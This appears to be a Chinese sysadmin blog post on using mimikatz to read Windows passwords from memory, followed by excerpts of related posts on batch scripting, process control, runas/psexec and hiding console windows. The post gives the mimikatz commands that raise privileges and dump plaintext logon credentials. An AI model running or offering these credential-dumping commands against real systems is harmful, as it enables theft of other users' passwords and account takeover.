使用mimikatz读取windows密码
mimikatz 是一个小工具,可以查看到 windows 加载进内存的密码数据,首先最起码要使用 Administrator 权限启动
依次执行:
从 administrator 提升到 system
1 | privilege::debug |
获取明文密码
1 | sekurlsa::logonpasswords |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 杂烩饭!
相关推荐
2024-10-31
Windows下使用bat脚本来新增环境变量
自己创建了一个 bin 目录用于存放一些 exe 或者 bat 用于快速调用, 把它加到 PATH 环境变量中就可以在任意路径来调用了. 查看环境变量1set PATH 设置环境变量1setx PATH "%PATH%;%USERPROFILE%\bin" 这里需要注意把原有的 %PATH% 带上, 不然就会覆盖掉 PATH 变量, %USERPROFILE% 指的是个人文件夹, 我的就是 C:\Users\iuxt 完整脚本首先判断一下有没有环境变量, 没有的话就增加, 有的话什么都不做. 123456set path | findstr "%USERPROFILE%\bin" >nul && ( echo 环境变量已存在) || ( echo 环境变量不存在 setx PATH "%PATH%;%USERPROFILE%\bin")
2024-10-31
Windows使用命令操作进程
查找进程1tasklist | findstr xxx 根据进程名杀进程1taskkill /F /IM npc.exe 根据进程 PID 杀进程1TASKKILL /PID 1230 /PID 1241 /PID 1253 /T
2024-11-29
Windows命令行使用其他用户身份运行
比如说我一个脚本使用管理员权限运行,那么它调用的其他程序默认都是以管理员权限运行的。我想要以普通用户程序来运行,有以下几种方法: runas 方式指定权限运行0x20000 是标准用户权限0x40000 是管理员权限 1runas /trustlevel:0x20000 "wt.exe" 这种方式我测试会造成 wsl 报错“UtilTranslatePathList” 指定用户执行1runas /user:iuxt wt.exe" 这种方式会弹窗让你输入密码(每次) psexecpsexec 是微软官方的一组小工具:https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec 需要用到里面的 psexec64.exe 然后调用此工具。 1psexec.exe -u iuxt -p YourPassword C:\Path\To\wt.exe 缺点: 需要在命令行指定用户名和密码(有安全隐患) 运行的时候会有个黑框框一闪而过,并且第一次启动会有个窗口,需要点一下 agree
2024-10-31
Windows系统隐藏文件
attrib 命令 这个只是隐藏, 并没有把文件加密 1attrib +S +H <文件或文件夹> 优点: 不用加密解密, 访问简单 缺点: 不安全 创建 vhd 并使用 bitlocker在磁盘管理里面创建 vhd 磁盘, 挂在好后使用 BitLocker 加密 (可选) 优点: 数据安全,没有密码无法解密 缺点: 容易损坏,造成数据全部丢失 使用第三方加密软件略 使用压缩软件加密略
2024-10-31
Windows隐藏cmd运行窗口
使用开源软件实现 (推荐) hidecon.exe 官网地址 使用方法,将 hidecon.exe 和其他可执行放在一块,在 bat 脚本前面加上 12hidecon.exenpc -server=xxx:8888 -vkey=xxxxxxxxxxxxxxxx -type=tcp 使用 vbs 实现(推荐)1CreateObject("WScript.Shell").Run "D:\syncthing\syncthing.exe",0 或者批量运行: 1234Set ws = CreateObject("Wscript.Shell")ws.run "cmd /c start 1.exe",vbhidews.run "cmd /c start 2.exe",vbhidews.run "cmd /c start 3.exe",vbhide 复制保存成 vbs 文件即可。 使用 cmd 实现(会有一闪而过的黑窗)12345@echo offif...
2024-10-31
bat命令修改windows环境变量
在 bat 下修改环境变量有几种方式, 比如 set setx vmic ENVIRONMENT setwindows 的 set 和 bash 里面直接赋值类似, 只在当前脚本中生效, 比如 1234set a=becho %a%b setxsetx 和 set 类似, 不一样的是 setx 会把设置持久化保存起来 1setx a c 因为 setx 直接将环境变量保存在注册表中, 所以 cmd 终端需要关闭重新打开才能生效 12echo %a%c 后续就算重启电脑, 也会生效, 不过数据量比较大的时候会报错: WARNING: The data being saved is truncated to 1024 characters, 最终修改的内容也是不完整的。所以不建议使用 vmicwmic 常用命令1234567891011# 创建系统变量wmic ENVIRONMENT create...
评论
公告
此博客为我记录运维工作总结所用,供网友阅读参考,如有侵权,请通知我,我会核实后进行处理。
欢迎加入技术交流群:
